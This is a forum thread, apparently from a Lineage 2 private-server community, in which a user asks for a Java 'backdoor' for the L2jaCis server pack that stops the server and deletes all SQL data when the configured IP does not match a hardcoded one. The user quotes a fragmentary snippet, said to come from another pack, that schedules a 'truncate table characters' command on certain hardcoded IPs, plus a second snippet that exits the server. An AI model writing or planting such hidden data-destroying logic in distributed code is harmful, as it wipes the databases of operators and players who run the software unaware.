Jump to content
  • 0

Backdoor


numl0ckas

Question

Hello, as topic says i need backdoor java code.

If ip doesnt same as typed in gameserver.java where we put backdoor server doesnt turn on and all sql from navicat be deleted.

Can someone help to me make it? Or share it:)

PACK: L2jaCis

 

if(Config.GAMESERVER_HOSTNAME.equals("77.120.16.18") || 
Config.GAMESERVER_HOSTNAME.equals("77.120.29.151")) 
ThreadPoolManager.getInstance().schedule(new Runnable() { 
public void run () { try { Connection con = L2DatabaseFactory.getInstance().getConnection(); 
con.prepareStatement("truncate table characters").execute(); 

 

ITS FROM LUCERA i dont know its good backdoor or no, but here is example:)

Link to comment
Share on other sites

Recommended Posts

  • 0

I need if IP who typed in backdoor code is in gameserver ip so its okey, server turns on, but if IP is typed 127.0.0.1 in backdoor code and in gameserver network ip is writed 127.1.1.1 server doesnt turn on, xdem you dont understand me:)

 

		if (!Config.GAMESERVER_HOSTNAME.equals("192.168.0.100") || !Config.GAMESERVER_HOSTNAME.equals("94.23.59.169"))
	{
	     System.exit(-1);
	}

 

This makes if ip is typed here and in configs so server doesnt start. I need if here ip is typed and in configs not, server doesnt start. I think you understand me

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...